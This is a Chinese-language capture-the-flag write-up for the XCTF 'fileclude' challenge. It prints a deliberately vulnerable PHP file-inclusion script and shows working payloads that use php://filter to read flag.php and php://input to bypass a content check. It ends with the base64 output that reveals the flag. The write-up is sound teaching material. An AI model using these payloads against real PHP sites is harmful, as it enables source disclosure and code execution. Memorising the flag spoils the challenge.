XCTF - fileclude
题目编号GFSJ1010
知识点
本题是典型的文件包含,主要知识点为php://input的使用
源码解析
WRONG WAY! <?php
//包含flag.php
include("flag.php");
//显示源码
highlight_file(__FILE__);
if(isset($_GET["file1"]) && isset($_GET["file2"]))
{
$file1 = $_GET["file1"];
$file2 = $_GET["file2"];
//file1和file2变量不为空
if(!empty($file1) && !empty($file2))
{
//file2的文件内容为hello ctf
if(file_get_contents($file2) === "hello ctf")
{
//包含file1
include($file1);
}
}
else
die("NONONO");
}
解题思路
通过源码分析,可以得出本题需要两个GET变量file1和file2。file1最典型的文件包含,可以用php:filter进行php源码的读取。file2也比较简单直接赋值为hello ctf即可。
payload如下:?file1=php://filter/convert.base64-encode/resource=flag.php&file2=hello ctf,但是运用如上payload,发现题目报错了,很明显不能直接输入file2的内容,想办法绕过即可
php://input
php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。
本题中,我们就可以运用他的后面的特性,post想设置的文件内容,php执行时会将post内容当作文件内容,我们可以用php://input,post一个hello ctf即可。payload如下?file1=php://filter/convert.base64-encode/resource=flag.php&file2=php://input post:hello ctf
我们可以看到flag.php的内容base64编码已经显示出来了,解码可获得flag
PD9waHAKZWNobyAiV1JPTkcgV0FZISI7Ci8vICRmbGFnID0gY3liZXJwZWFjZXs4NjEzNTRjMGQ4Y2Y0MjM4YTI5OWVhMjU1MjM3MTMwNX0=